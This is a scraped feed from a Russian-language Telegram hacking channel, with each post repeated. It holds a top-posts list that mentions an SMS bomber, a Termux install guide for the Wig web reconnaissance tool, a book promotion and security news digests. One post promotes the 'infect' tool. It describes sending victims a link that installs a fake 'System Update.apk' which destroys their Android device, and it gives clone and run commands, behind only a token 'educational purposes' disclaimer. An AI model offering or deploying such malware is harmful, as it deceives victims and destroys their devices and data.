#подборка
Топ популярных постов за прошедшую неделю:
1. Пропаганда в интернете: какие методы и технологии
используются для влияния на общественное мнение
2. 5 Утилит Linux для проверки сетевого подключения
3. kalel: инструментарий для тестирования сетевых нагрузок и
на проникновение
4. SMS бомбер
5. Огромный список ресурсов Hakluke для начинающих
хакеров
6. Киберфон. Превращаем телефон на Android в инструмент
хакера
7. Инструменты для разведки и исследования
Life-Hack [Жизнь-Взлом]/Хакинг
Топ популярных постов за прошедшую неделю:
1. Пропаганда в интернете: какие методы и технологии
используются для влияния на общественное мнение
2. 5 Утилит Linux для проверки сетевого подключения
3. kalel: инструментарий для тестирования сетевых нагрузок и
на проникновение
4. SMS бомбер
5. Огромный список ресурсов Hakluke для начинающих
хакеров
6. Киберфон. Превращаем телефон на Android в инструмент
хакера
7. Инструменты для разведки и исследования
Life-Hack [Жизнь-Взлом]/Хакинг
This media is not supported in your browser
VIEW IN TELEGRAM
WiG в термукс
Wig — это инструмент по сбору информации о веб приложениях, который идентифицирует ряд систем управления контентом (CMS) и другие административные приложения.
Установка
качаем гит и питон:
apt install git python
Теперь инструмент:
git clone https://github.com/jekyc/wig
Переходим в папку с ним:
cd wig
запускаем файл установки:
python setup.py install
И вот так можем использовать прогу:
python wig.py сайт
А вот всю ключи для использования:
usage: wig.py [-h] [-l INPUT_FILE] [-q] [-n STOP_AFTER] [-a] [-
m] [-u] [-d]
[-t THREADS] [--no_cache_load] [--no_cache_save]
[-N]
[--verbosity] [--proxy PROXY] [-w OUTPUT_FILE]
[url]
Информация предоставлена исключительно для ознакомительных целей!
Life-Hack [Жизнь-Взлом]/Хакинг
#рекомендация
Wig — это инструмент по сбору информации о веб приложениях, который идентифицирует ряд систем управления контентом (CMS) и другие административные приложения.
Установка
качаем гит и питон:
apt install git python
Теперь инструмент:
git clone https://github.com/jekyc/wig
Переходим в папку с ним:
cd wig
запускаем файл установки:
python setup.py install
И вот так можем использовать прогу:
python wig.py сайт
А вот всю ключи для использования:
usage: wig.py [-h] [-l INPUT_FILE] [-q] [-n STOP_AFTER] [-a] [-
m] [-u] [-d]
[-t THREADS] [--no_cache_load] [--no_cache_save]
[-N]
[--verbosity] [--proxy PROXY] [-w OUTPUT_FILE]
[url]
Информация предоставлена исключительно для ознакомительных целей!
Life-Hack [Жизнь-Взлом]/Хакинг
#рекомендация
Как заразить вирусом любое устройство?
Заражение происходит по ссылке. Хакер создаёт ссылку, кидает ее жертве, она переходит и на устройство жертвы скачивается файл System Update.apk.
ВСЯ ИНФОРМАЦИЯ ПРЕДОСТАВЛЕНА ИСКЛЮЧИТЕЛЬНО В ОЗНАКОМИТЕЛЬНЫХ ЦЕЛЯХ!!!! АВТОР НЕ НЕСЕТ НИКАКОЙ ОТВЕТСВЕННОСТИ!
После установки данного ПО Андройд жертвы начнёт уничтожатся.
Установка:
$ git clone https://github.com/noob-hackers/infect
$ cd $HOME
$ cd infect
Использование:
$ bash infect.sh
Вся подробная информация предоставлена на GitHub
Life-Hack [Жизнь-Взлом]/Хакинг
#рекомендация
Заражение происходит по ссылке. Хакер создаёт ссылку, кидает ее жертве, она переходит и на устройство жертвы скачивается файл System Update.apk.
ВСЯ ИНФОРМАЦИЯ ПРЕДОСТАВЛЕНА ИСКЛЮЧИТЕЛЬНО В ОЗНАКОМИТЕЛЬНЫХ ЦЕЛЯХ!!!! АВТОР НЕ НЕСЕТ НИКАКОЙ ОТВЕТСВЕННОСТИ!
После установки данного ПО Андройд жертвы начнёт уничтожатся.
Установка:
$ git clone https://github.com/noob-hackers/infect
$ cd $HOME
$ cd infect
Использование:
$ bash infect.sh
Вся подробная информация предоставлена на GitHub
Life-Hack [Жизнь-Взлом]/Хакинг
#рекомендация
Forwarded from IT курсы / Программирование
Blockchain for Cybersecurity in Cyber-Physical Systems (2023)
Автор: Imed Romdhani
Технология блокчейн проникла во все сферы нашей жизни, от производства до здравоохранения и не только. Кибербезопасность - это отрасль, на которую эта технология оказала значительное влияние, и, возможно, еще большее в будущем. Эта книга охватывает различные тематические исследования и применения блокчейна в различных киберфизических областях, таких как умные города, IoT, здравоохранение, производство, онлайн-мошенничество и т.д.
Скачать книгу…
Автор: Imed Romdhani
Технология блокчейн проникла во все сферы нашей жизни, от производства до здравоохранения и не только. Кибербезопасность - это отрасль, на которую эта технология оказала значительное влияние, и, возможно, еще большее в будущем. Эта книга охватывает различные тематические исследования и применения блокчейна в различных киберфизических областях, таких как умные города, IoT, здравоохранение, производство, онлайн-мошенничество и т.д.
Скачать книгу…
This media is not supported in your browser
VIEW IN TELEGRAM
#дайджест
1. Группировка ShinyHunters возродит закрытый форум Breached
Подробней
2. Онлайн-банкинг в Латинской Америке больше нельзя
назвать безопасным. Постарались бразильские хакеры
Подробней
3. Северокорейские хакеры Kimsuky притворяются
журналистами
Подробней
4. Троян TrueBot теперь грузится с сайтов под видом апдейта
Chrome
Подробней
1. Группировка ShinyHunters возродит закрытый форум Breached
Подробней
2. Онлайн-банкинг в Латинской Америке больше нельзя
назвать безопасным. Постарались бразильские хакеры
Подробней
3. Северокорейские хакеры Kimsuky притворяются
журналистами
Подробней
4. Троян TrueBot теперь грузится с сайтов под видом апдейта
Chrome
Подробней
#статья
Мастерская хакера. ИИ-помощники, работа с JSON и приятные мелочи, которые пригодятся в работе
Мастерская хакера. ИИ-помощники, работа с JSON и приятные мелочи, которые пригодятся в работе
Telegraph
Мастерская хакера. ИИ-помощники, работа с JSON и приятные мелочи, которые пригодятся в работе
Соскучился по нашим подборкам утилит? Сейчас исправим! Сегодня я принес тебе заморские диковинки, которые и код напишут, и отладят его, и расскажут, как работу правильно сделать. А бонусом еще немного штук, которым ты и сам найдешь применение.…
This media is not supported in your browser
VIEW IN TELEGRAM
#дайджест
1. Android-малварь SpinOK нашли в приложениях с 30 млн
установок
Подробней
2. Мультиплатформенного шифровальщика Cyclops поженили
с инфостилером
Подробней
3. Исследователи обнаружили в Интернете десятки тысяч
вредоносных Android-приложений, показывающих
рекламные баннеры
Подробней
4. В открытом доступе опубликованы данные клиентов
«Ашан» и «Твой Дом»
Подробней
1. Android-малварь SpinOK нашли в приложениях с 30 млн
установок
Подробней
2. Мультиплатформенного шифровальщика Cyclops поженили
с инфостилером
Подробней
3. Исследователи обнаружили в Интернете десятки тысяч
вредоносных Android-приложений, показывающих
рекламные баннеры
Подробней
4. В открытом доступе опубликованы данные клиентов
«Ашан» и «Твой Дом»
Подробней
This media is not supported in your browser
VIEW IN TELEGRAM
This media is not supported in your browser
VIEW IN TELEGRAM